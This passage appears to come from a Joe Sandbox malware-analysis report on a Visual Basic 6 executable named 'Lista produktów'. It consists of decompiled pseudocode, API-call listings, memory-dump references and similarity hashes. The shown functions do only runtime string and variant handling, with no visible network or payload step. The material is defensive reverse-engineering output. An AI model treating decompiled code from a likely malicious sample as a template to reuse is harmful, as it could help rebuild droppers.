                  					_push(3);
                  					L004013B8();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					L004013A6();
                  					return _t77;
                  					L6:
                  				}
                  			}











                  APIs
                  • __vbaI4Var.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000002), ref: 00410FD0
                  • #632.MSVBVM60(?,?,00000000,?,00000002,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410FE1
                  • __vbaStrVarVal.MSVBVM60(?,?,?,?,00000000,?,00000002,?,?,?,?,?,?,?,?,?), ref: 00410FF1
                  • #516.MSVBVM60(00000000,?,?,?,?,00000000,?,00000002,?,?,?,?,?,?,?,?), ref: 00410FF7
                  • #573.MSVBVM60(?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 0041101B
                  • __vbaVarAdd.MSVBVM60(?,?,?,?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 00411032
                  • __vbaVarMove.MSVBVM60(?,?,?,?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 0041103C
                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00000002,00000000,?,?,?,?,00000000,?,00000002), ref: 00411044
                  • __vbaFreeVarList.MSVBVM60(00000004,00000002,?,00000002,?,?,?,?,?,00000002,00000000,?,?,?,?,00000000), ref: 00411067
                  • __vbaVarForNext.MSVBVM60(?,?,?,?,?,?,?,004011F6), ref: 00411081
                  • __vbaVarAdd.MSVBVM60(?,?,00000008,0000000A,00000001,00000001), ref: 004110DE
                  • #650.MSVBVM60(00000000,?,?,00000008,0000000A,00000001,00000001), ref: 004110E4
                  • __vbaVarMove.MSVBVM60(00000000,?,?,00000008,0000000A,00000001,00000001), ref: 00411102
                  • __vbaFreeVarList.MSVBVM60(00000002,?,0000000A,00000000,?,?,00000008,0000000A,00000001,00000001), ref: 00411117
                  • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,004111AC,?,?,?,?,?,?,?,?,004011F6), ref: 00411173
                  • __vbaFreeVar.MSVBVM60(?,?,?,004011F6), ref: 0041117E
                  • __vbaFreeVar.MSVBVM60(?,?,?,004011F6), ref: 00411186
                  • __vbaFreeVar.MSVBVM60(?,?,?,004011F6), ref: 0041118E
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$List$Move$#516#573#632#650Next
                  • String ID:
                  • API String ID: 1850725036-0
                  • Opcode ID: 4cd3c86d69642dcd301a213dfd13ac64d2e7440048f37005a743a34362f7c2c1
                  • Instruction ID: 9228b074edff6c7148bfddd31f03498038a44a97c51c4c87e5559b8c814fbbe8
                  • Opcode Fuzzy Hash: 4cd3c86d69642dcd301a213dfd13ac64d2e7440048f37005a743a34362f7c2c1
                  • Instruction Fuzzy Hash: 36419DB2C0021CAADB51EB91CC86FDEB37CAB14304F5041EBA549F2191EF786B898F55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00410C35(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				short _v24;
                  				void* _v28;
                  				void* _v32;
                  				signed int _v36;
                  				char _v40;
                  				void* _v44;
                  				intOrPtr* _v48;
                  				signed int _v52;
                  				intOrPtr* _v56;
                  				signed int _v60;
                  				signed int _v68;
                  				intOrPtr* _v72;
                  				signed int _v76;
                  				signed int _v80;
                  				intOrPtr* _v84;
                  				signed int _v88;
                  				signed int _t70;
                  				signed int _t75;
                  				char* _t80;
                  				signed int _t84;
                  				short _t85;
                  				intOrPtr _t103;
                  
                  				_push(0x4011f6);
                  				_push( *[fs:0x0]);
                  				 *[fs:0x0] = _t103;
                  				_push(0x44);
                  				L004011F0();
                  				_v12 = _t103;
                  				_v8 = 0x4011b8;
                  				L0040136A();
                  				if( *0x4123c0 != 0) {
                  					_v72 = 0x4123c0;
                  				} else {
                  					_push(0x4123c0);
                  					_push(0x403004);
                  					L00401388();
                  					_v72 = 0x4123c0;
                  				}
                  				_v48 =  *_v72;
                  				_t70 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v40);
                  				asm("fclex");
                  				_v52 = _t70;
                  				if(_v52 >= 0) {
                  					_v76 = _v76 & 0x00000000;
                  				} else {
                  					_push(0x14);
                  					_push(0x402ff4);
                  					_push(_v48);
                  					_push(_v52);
                  					L00401394();
                  					_v76 = _t70;
                  				}
                  				_v56 = _v40;
                  				_t75 =  *((intOrPtr*)( *_v56 + 0xe8))(_v56,  &_v36);
                  				asm("fclex");
                  				_v60 = _t75;
                  				if(_v60 >= 0) {
                  					_v80 = _v80 & 0x00000000;
                  				} else {
                  					_push(0xe8);
                  					_push(0x403014);
                  					_push(_v56);
                  					_push(_v60);
                  					L00401394();
                  					_v80 = _t75;
                  				}
                  				_v68 = _v36;
                  				_v36 = _v36 & 0x00000000;
                  				L004013B2();
                  				L00401382();
                  				if( *0x412010 != 0) {
                  					_v84 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v84 = 0x412010;
                  				}
                  				_t80 =  &_v40;
                  				L00401358();
                  				_v48 = _t80;
                  				_t84 =  *((intOrPtr*)( *_v48 + 0xf8))(_v48,  &_v44, _t80,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x300))( *_v84));
                  				asm("fclex");
                  				_v52 = _t84;
                  				if(_v52 >= 0) {
                  					_v88 = _v88 & 0x00000000;
                  				} else {
                  					_push(0xf8);
                  					_push(0x4030ec);
                  					_push(_v48);
                  					_push(_v52);
                  					L00401394();
                  					_v88 = _t84;
                  				}
                  				_t85 = _v44;
                  				_v24 = _t85;
                  				L00401382();
                  				_push(0x410dec);
                  				L00401364();
                  				L00401364();
                  				return _t85;
                  			}




























                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410C50
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 00410C68
                  • __vbaNew2.MSVBVM60(00403004,004123C0,?,?,?,?,004011F6), ref: 00410C80
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00410CC4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000E8), ref: 00410D05
                  • __vbaStrMove.MSVBVM60 ref: 00410D23
                  • __vbaFreeObj.MSVBVM60 ref: 00410D2B
                  • __vbaNew2.MSVBVM60(0040246C,(RO), ref: 00410D43
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410D70
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030EC,000000F8), ref: 00410DA5
                  • __vbaFreeObj.MSVBVM60 ref: 00410DBE
                  • __vbaFreeStr.MSVBVM60(00410DEC), ref: 00410DDE
                  • __vbaFreeStr.MSVBVM60(00410DEC), ref: 00410DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$CheckHresult$New2$ChkstkCopyMove
                  • String ID: (RO
                  • API String ID: 4110455518-2817633693
                  • Opcode ID: 95300b48452b51f770d4c72b014544a06553ac77becf2c4403ea04b40c536b04
                  • Instruction ID: 024535f1ee5fae5b6a6260df13b9132df2a30069dd4cf38f6b1a84f4d7f0ceca
                  • Opcode Fuzzy Hash: 95300b48452b51f770d4c72b014544a06553ac77becf2c4403ea04b40c536b04
                  • Instruction Fuzzy Hash: 0051E070900208EFDB00DFE5D985BDDBBB5BF08304F20812AE901B72A1D7B96995DB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 46%
                  			E00410EBC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				char _v40;
                  				char _v56;
                  				char _v72;
                  				char _v88;
                  				void* _v104;
                  				char _v120;
                  				char _v124;
                  				intOrPtr _v132;
                  				char _v140;
                  				intOrPtr _v148;
                  				char _v156;
                  				short _v164;
                  				char _v172;
                  				char _v188;
                  				char _v204;
                  				signed int _v212;
                  				char _v220;
                  				intOrPtr _v228;
                  				char _v236;
                  				char _v252;
                  				char _v268;
                  				char _v284;
                  				intOrPtr _v296;
                  				char* _t83;
                  				char* _t86;
                  				char* _t90;
                  				char* _t94;
                  				char* _t97;
                  				char* _t99;
                  				short _t103;
                  				char* _t115;
                  				char* _t119;
                  				void* _t140;
                  				void* _t142;
                  				intOrPtr _t143;
                  
                  				_t143 = _t142 - 0xc;
                  				 *[fs:0x0] = _t143;
                  				L004011F0();
                  				_v16 = _t143;
                  				_v12 = 0x4011e0;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t140);
                  				L004012BC();
                  				_push( &_v252);
                  				_t83 =  &_v72;
                  				_push(_t83);
                  				L004012B6();
                  				if(_t83 == 0) {
                  					_push( &_v252);
                  					_t86 =  &_v88;
                  					_push(_t86);
                  					L004012B6();
                  					if(_t86 != 0) {
                  						_v212 = _v212 | 0xffffffff;
                  						_v220 = 2;
                  						_v228 = 1;
                  						_v236 = 2;
                  						_push( &_v220);
                  						_push( &_v236);
                  						_push( &_v120);
                  						_t94 =  &_v140;
                  						_push(_t94);
                  						L004012AA();
                  						_push(_t94);
                  						_push( &_v284);
                  						_push( &_v268);
                  						_t97 =  &_v40;
                  						_push(_t97);
                  						L004012B0();
                  						_v296 = _t97;
                  						while(_v296 != 0) {
                  							_v132 = 1;
                  							_v140 = 2;
                  							_push( &_v140);
                  							_t99 =  &_v40;
                  							_push(_t99);
                  							L00401346();
                  							_push(_t99);
                  							_push( &_v120);
                  							_push( &_v156);
                  							L00401292();
                  							_push( &_v156);
                  							_t103 =  &_v124;
                  							_push(_t103);
                  							L00401298();
                  							_push(_t103);
                  							L0040129E();
                  							_v164 = _t103;
                  							_v172 = 2;
                  							_push( &_v172);
                  							_push( &_v188);
                  							L004012A4();
                  							_push( &_v56);
                  							_push( &_v188);
                  							_push( &_v204);
                  							L0040133A();
                  							L00401340();
                  							L00401364();
                  							_push( &_v188);
                  							_push( &_v172);
                  							_push( &_v156);
                  							_push( &_v140);
                  							_push(4);
                  							L004013B8();
                  							_t143 = _t143 + 0x14;
                  							_push( &_v284);
                  							_push( &_v268);
                  							_t115 =  &_v40;
                  							_push(_t115);
                  							L0040128C();
                  							_v296 = _t115;
                  						}
                  						_v148 = 0x80020004;
                  						_v156 = 0xa;
                  						_v212 = 0x403228;
                  						_v220 = 8;
                  						_push(1);
                  						_push(1);
                  						_push( &_v156);
                  						_push( &_v220);
                  						_push( &_v56);
                  						_t119 =  &_v140;
                  						_push(_t119);
                  						L0040133A();
                  						_push(_t119);
                  						L00401286();
                  						_v164 = _t119;
                  						_v172 = 8;
                  						L00401340();
                  						_push( &_v156);
                  						_push( &_v140);
                  						_push(2);
                  						L004013B8();
                  						_t143 = _t143 + 0xc;
                  					}
                  				} else {
                  					L004012BC();
                  				}
                  				_push(0x4111ac);
                  				_push( &_v284);
                  				_push( &_v268);
                  				_t90 =  &_v252;
                  				_push(_t90);
                  				_push(3);
                  				L004013B8();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				return _t90;
                  			}










































                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410EDA
                  • __vbaVarCopy.MSVBVM60(?,?,?,?,004011F6), ref: 00410F07
                  • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,?,004011F6), ref: 00410F17
                  • __vbaVarCopy.MSVBVM60(?,?,?,?,?,?,004011F6), ref: 00410F29
                  • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,?,?,?,004011F6), ref: 00410F3E
                  • __vbaLenVar.MSVBVM60(?,?,00000002,00000002), ref: 00410F8C
                  • __vbaVarForInit.MSVBVM60(?,?,?,00000000,?,?,00000002,00000002), ref: 00410FA4
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Copy$ChkstkInit
                  • String ID:
                  • API String ID: 3826034973-0
                  • Opcode ID: d3ced0dd5c703300f44cb424f73d22857c4db9a1b83eaae256af07889db05f3a
                  • Instruction ID: f89c889c320f9f68246e9bd7ef3dcdbd7556e1c525a84103f408a27ce6f7dab8
                  • Opcode Fuzzy Hash: d3ced0dd5c703300f44cb424f73d22857c4db9a1b83eaae256af07889db05f3a
                  • Instruction Fuzzy Hash: DD21017180055DABCB11DB95C985FDEB7BCAF08304F1085ABB209F7151EB789B898F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E00410E09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				long long _v32;
                  				void* _v36;
                  				char _v44;
                  				char _v52;
                  				char* _t19;
                  				void* _t27;
                  				void* _t29;
                  				intOrPtr _t30;
                  
                  				_t30 = _t29 - 0xc;
                  				 *[fs:0x0] = _t30;
                  				L004011F0();
                  				_v16 = _t30;
                  				_v12 = 0x4011d0;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4011f6, _t27);
                  				_v44 = 2;
                  				_v52 = 2;
                  				_t19 =  &_v52;
                  				_push(_t19);
                  				L004013AC();
                  				L004013B2();
                  				L004013A6();
                  				_v32 =  *0x4011c8;
                  				asm("wait");
                  				_push(0x410e95);
                  				L00401364();
                  				return _t19;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410E25
                  • #536.MSVBVM60(00000002), ref: 00410E5B
                  • __vbaStrMove.MSVBVM60(00000002), ref: 00410E65
                  • __vbaFreeVar.MSVBVM60(00000002), ref: 00410E6D
                  • __vbaFreeStr.MSVBVM60(00410E95,00000002), ref: 00410E8F
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$#536ChkstkMove
                  • String ID:
                  • API String ID: 2104488870-0
                  • Opcode ID: b700f43e101432fa6fa79f13be68e8778472f4484f8dc53e7c6aad7b04ac9813
                  • Instruction ID: 65fec2802833ff761578360ba7738edd19d08363b81867d35fb2e76992f97c1d
                  • Opcode Fuzzy Hash: b700f43e101432fa6fa79f13be68e8778472f4484f8dc53e7c6aad7b04ac9813
                  • Instruction Fuzzy Hash: 41014B71810208ABDB04EF96DC8AFDEBBB8BF08744F40842AF501BB5A1DBBC5544CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 19%
                  			E0041040F() {
                  				void* _t14;
                  				void* _t15;
                  
                  				_push(3);
                  				L0040131C();
                  				_push(_t15 - 0x354);
                  				_push(_t15 - 0x350);
                  				_push(_t15 - 0x34c);
                  				_push(3);
                  				L0040134C();
                  				_push(_t15 - 0x384);
                  				_push(_t15 - 0x374);
                  				_push(_t15 - 0x364);
                  				_push(3);
                  				L004013B8();
                  				_t14 = _t15 - 0x388;
                  				_push(_t14);
                  				_push(0);
                  				L004012DA();
                  				return _t14;
                  			}

                  APIs
                  • __vbaFreeStrList.MSVBVM60(00000003,00401C28), ref: 00410411
                  • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00410430
                  • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041044F
                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410460
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$FreeList$Destruct
                  • String ID:
                  • API String ID: 524854962-0
                  • Opcode ID: b58e2de8c947d5613cb7fb2b3b70ef42882ea12d68f185262f30ef51bebb3e5a
                  • Instruction ID: 25c989454ba01100b756f1bd32ce8504364835efd1bbf0d1260096a30a35e034
                  • Opcode Fuzzy Hash: b58e2de8c947d5613cb7fb2b3b70ef42882ea12d68f185262f30ef51bebb3e5a
                  • Instruction Fuzzy Hash: 97F0C9B28502186BFB52E691CD42FEA737CAB14704F8401EBBA0CE5091EA356B884B61
                  Uniqueness

                  Uniqueness Score: -1.00%